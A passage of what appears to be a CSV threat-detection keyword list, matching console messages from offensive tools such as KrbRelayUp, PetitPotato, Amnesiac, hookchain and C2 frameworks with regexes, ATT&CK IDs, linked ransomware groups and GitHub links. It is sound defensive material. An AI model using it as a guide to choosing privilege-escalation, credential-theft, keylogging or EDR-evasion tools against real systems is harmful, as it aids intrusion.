Relaying to ADCS now*",".{0,1000}\[\+\]\sGot\sKrb\sAuth\sfrom\sNT\/System\.\sRelaying\sto\sADCS\snow.{0,1000}","offensive_tool_keyword","KrbRelayUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13157" "*[+] Got Krb Auth from NT/System. Relaying to ADCS now*",".{0,1000}\[\+\]\sGot\sKrb\sAuth\sfrom\sNT\/System\.\sRelaying\sto\sADCS\snow.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13158" "*[+] Got Krb Auth from NT/System. Relaying to ADCS now*",".{0,1000}\[\+\]\sGot\sKrb\sAuth\sfrom\sNT\/System\.\sRelaying\sto\sADCS\snow.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#content","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","13159" "*[+] Got Krb Auth from NT/SYSTEM. 
Relying to LDAP now*",".{0,1000}\[\+\]\sGot\sKrb\sAuth\sfrom\sNT\/SYSTEM\.\sRelying\sto\sLDAP\snow.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13160" "*[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now*",".{0,1000}\[\+\]\sGot\sKrb\sAuth\sfrom\sNT\/SYSTEM\.\sRelying\sto\sLDAP\snow.{0,1000}","offensive_tool_keyword","KrbRelayUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13161" "*[+] Got Krb Auth from NT/SYSTEM. 
Relying to LDAP now*",".{0,1000}\[\+\]\sGot\sKrb\sAuth\sfrom\sNT\/SYSTEM\.\sRelying\sto\sLDAP\snow.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","KrbRelayUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13162" "*[+] Got NTLM type 3 AUTH message from * with hostname *",".{0,1000}\[\+\]\sGot\sNTLM\stype\s3\sAUTH\smessage\sfrom\s.{0,1000}\s\swith\shostname\s.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","#content","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","13163" "*[+] Got System!!!\n*",".{0,1000}\[\+\]\sGot\sSystem!!!\\n.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#content","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","13164" "*[+] hacked the exterior layer of the datacenter mainframe*",".{0,1000}\[\+\]\shacked\sthe\sexterior\slayer\sof\sthe\sdatacenter\smainframe.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content 
#linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","13165" "*[+] Hello from DllMain-PROCESS_ATTACH in Merlin*",".{0,1000}\[\+\]\sHello\sfrom\sDllMain\-PROCESS_ATTACH\sin\sMerlin.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","#content","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","13166" "*[+] Hijackable DLL: *",".{0,1000}\[\+\]\sHijackable\sDLL\:\s.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","#content","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","13167" "*[+] hijacking suid binary*",".{0,1000}\[\+\]\shijacking\ssuid\sbinary.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","0","#content #linux","N/A","10","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","13168" "*[+] HiveDump Loaded *",".{0,1000}\[\+\]\sHiveDump\sLoaded\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black 
Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13169" "*[+] HiveDump Loaded*",".{0,1000}\[\+\]\sHiveDump\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13170" "*[+] HKLM\\SAM is saved successfully*",".{0,1000}\[\+\]\sHKLM\\\\SAM\sis\ssaved\ssuccessfully.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#content","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","13171" "*[+] HookChain implanted! 
\\o/*",".{0,1000}\[\+\]\sHookChain\simplanted!\s\\\\o\/.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","#content","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","13172" "*[+] HookChain implanted!*",".{0,1000}\[\+\]\sHookChain\simplanted!.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","#content","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","13173" "*[+] HTTP Client Auth Context swapped with SYSTEM *",".{0,1000}\[\+\]\sHTTP\sClient\sAuth\sContext\sswapped\swith\sSYSTEM\s.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","#content","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","13174" "*[+] HTTP reflected DCOM authentication succeeded!*",".{0,1000}\[\+\]\sHTTP\sreflected\sDCOM\sauthentication\ssucceeded!.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","#content","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","13175" "*[+] ICMP listener started!*",".{0,1000}\[\+\]\sICMP\slistener\sstarted!.{0,1000}","offensive_tool_keyword","PingRAT","secretly passes Command and Control (C2) traffic through firewalls using ICMP payloads","T1071.004 - T1573.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/umutcamliyurt/PingRAT","1","0","#content","N/A","10","10","416","55","2023-09-29T22:26:15Z","2023-09-29T22:07:46Z","13176" "*[+] ICYGUIDER'S CUSTOM SYSCALL SHELLCODE LOADER*",".{0,1000}\[\+\]\sICYGUIDER\'S\sCUSTOM\sSYSCALL\sSHELLCODE\sLOADER.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","#content","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","13177" "*[+] Impersonating user * to target SPN *",".{0,1000}\[\+\]\sImpersonating\suser\s.{0,1000}\sto\starget\sSPN\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13178" "*[+] Impersonation as smss.exe*",".{0,1000}\[\+\]\sImpersonation\sas\ssmss\.exe.{0,1000}","offensive_tool_keyword","PrivFu","execute process as NT SERVICE\TrustedInstaller group account","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#content","TrustExec","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","13179" "*[+] Impersonation as winlogon.exe is successful*",".{0,1000}\[\+\]\sImpersonation\sas\swinlogon\.exe\sis\ssuccessful.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#content","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","13180" "*[+] Impersonation successful using token from PID *",".{0,1000}\[\+\]\sImpersonation\ssuccessful\susing\stoken\sfrom\sPID\s.{0,1000}","offensive_tool_keyword","Token-Impersonation","Make a Token (local admin rights not required) or Steal the Token of the specified Process ID (local admin rights required)","T1134.001 - T1134.002","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Token-Impersonation","1","0","#content","N/A","8","1","7","3","2024-03-20T17:07:13Z","2023-11-02T10:46:24Z","13181" "*[+] Importing ticket into a sacrificial process using CreateNetOnly*",".{0,1000}\[\+\]\sImporting\sticket\sinto\sa\ssacrificial\sprocess\susing\sCreateNetOnly.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#content","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","13182" "*[+] init.d backdoor establish*",".{0,1000}\[\+\]\sinit\.d\sbackdoor\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - 
T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13183" "*[+] Injected the * DLL into process *",".{0,1000}\[\+\]\sInjected\sthe\s.{0,1000}\sDLL\sinto\sprocess\s.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","#content","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","13184" "*[+] Injecting dropper.vba into *",".{0,1000}\[\+\]\sInjecting\sdropper\.vba\sinto\s.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","#content","N/A","10","","N/A","","","","13185" "*[+] Injecting into existing process*",".{0,1000}\[\+\]\sInjecting\sinto\sexisting\sprocess.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. 
This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","13186" "*[+] Injecting into existing process*",".{0,1000}\[\+\]\sInjecting\sinto\sexisting\sprocess.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","#content","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","13187" "*[+] Injecting into existing process*",".{0,1000}\[\+\]\sInjecting\sinto\sexisting\sprocess.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13188" "*[+] Injecting Shellcode into Remote Process*",".{0,1000}\[\+\]\sInjecting\sShellcode\sinto\sRemote\sProcess.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#content","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","13189" "*[+] Invoke-DCSync Loaded*",".{0,1000}\[\+\]\sInvoke\-DCSync\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in 
PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13190" "*[+] Invoke-GrabTheHash Loaded*",".{0,1000}\[\+\]\sInvoke\-GrabTheHash\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13191" "*[+] Invoking EfsRpcAddUsersToFile with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcAddUsersToFile\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13192" "*[+] Invoking EfsRpcAddUsersToFileEx with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcAddUsersToFileEx\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13193" "*[+] Invoking EfsRpcDecryptFileSrv with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcDecryptFileSrv\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - 
T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13194" "*[+] Invoking EfsRpcDuplicateEncryptionInfoFile with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcDuplicateEncryptionInfoFile\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13195" "*[+] Invoking EfsRpcDuplicateEncryptionInfoFile with target path:*",".{0,1000}\[\+\]\sInvoking\sEfsRpcDuplicateEncryptionInfoFile\swith\starget\spath\:.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13196" "*[+] Invoking EfsRpcEncryptFileSrv with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcEncryptFileSrv\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13197" "*[+] Invoking EfsRpcFileKeyInfo with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcFileKeyInfo\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13198" "*[+] Invoking EfsRpcFileKeyInfoEx with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcFileKeyInfoEx\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13199" "*[+] Invoking EfsRpcGetEncryptedFileMetadata with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcGetEncryptedFileMetadata\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13200" "*[+] Invoking EfsRpcOpenFileRaw with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcOpenFileRaw\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13201" "*[+] Invoking EfsRpcQueryRecoveryAgents with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcQueryRecoveryAgents\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13202" "*[+] Invoking EfsRpcQueryUsersOnFile with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcQueryUsersOnFile\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13203" "*[+] Invoking EfsRpcRemoveUsersFromFile with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcRemoveUsersFromFile\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13204" "*[+] Invoking EfsRpcSetEncryptedFileMetadata with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcSetEncryptedFileMetadata\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13205" "*[+] Jecretz Results*",".{0,1000}\[\+\]\sJecretz\sResults.{0,1000}","offensive_tool_keyword","jecretz","Jira Secret Hunter - Helps you find credentials and sensitive contents in Jira tickets","T1552 - T1114 - T1119 - T1070","TA0006 - TA0009 - TA0005","N/A","Scattered 
Spider*","Discovery","https://github.com/sahadnk72/jecretz","1","0","#content","N/A","7","1","43","9","2022-12-08T10:00:11Z","2020-05-25T14:40:28Z","13206" "*[+] Keylog recieved, data written to keylog.txt!*",".{0,1000}\[\+\]\sKeylog\srecieved,\sdata\swritten\sto\skeylog\.txt!.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#content","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","13207" "*[+] Keylog saved to *",".{0,1000}\[\+\]\sKeylog\ssaved\sto\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13208" "*[+] Keylogger started *",".{0,1000}\[\+\]\sKeylogger\sstarted\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13209" "*[+] Keylogger started with PID *",".{0,1000}\[\+\]\sKeylogger\sstarted\swith\sPID\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black 
Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13210" "*[+] Keylogger started*",".{0,1000}\[\+\]\sKeylogger\sstarted.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","#content","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","13211" "*[+] Keylogger stopped*",".{0,1000}\[\+\]\sKeylogger\sstopped.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","#content","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","13212" "*[+] keystrokes dump from agent*",".{0,1000}\[\+\]\skeystrokes\sdump\sfrom\sagent.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","#content","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","13213" "*[+] Listing ntdll Nt/Zw functions*",".{0,1000}\[\+\]\sListing\sntdll\sNt\/Zw\sfunctions.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","#content","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","13214" "*[+] Loading BetterXencrypt and doing some encryption with random 
